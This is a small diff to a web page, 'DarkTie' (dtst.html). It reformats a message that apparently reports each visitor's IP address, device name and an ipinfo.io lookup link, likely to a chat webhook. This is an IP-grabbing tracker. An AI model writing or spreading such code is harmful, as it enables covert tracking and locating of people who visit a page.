--- a/dtst.html
+++ b/dtst.html
@@ -58,7 +58,7 @@
 
             
             var data = {
-                content: "```Page: DarkTie (dtst.html)```\n" + "```js\n" + "IP Address: " + ip + "```\n```js\n" + "\nDevice Name: " + deviceName + "```\n" + "https://ipinfo.io/" + ip
+                content: "```Page: DarkTie (dtst.html)```\n" + "```js\n" + "IP Address: " + ip + "```\n```js\n" + "\nDevice Name: " + deviceName + "```\n" + "<https://ipinfo.io/" + ip + ">"
             };
 
       
